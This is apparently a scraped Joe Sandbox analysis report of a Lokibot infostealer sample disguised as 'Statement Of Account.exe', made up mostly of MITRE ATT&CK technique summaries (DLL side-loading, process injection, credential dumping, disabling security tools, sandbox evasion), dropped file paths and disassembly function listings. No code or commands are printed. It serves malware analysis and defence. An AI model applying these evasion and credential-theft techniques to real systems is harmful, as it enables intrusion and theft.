Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Statement Of Account.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\disimmure

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
Statement Of Account.exe

Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141
windowCOMMON

Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165
COMMON

Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167
registryCOMMON

Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145
COMMON

Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74
windowregistryCOMMON

Function 004102F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171
COMMON

Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126
COMMON

Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76
COMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre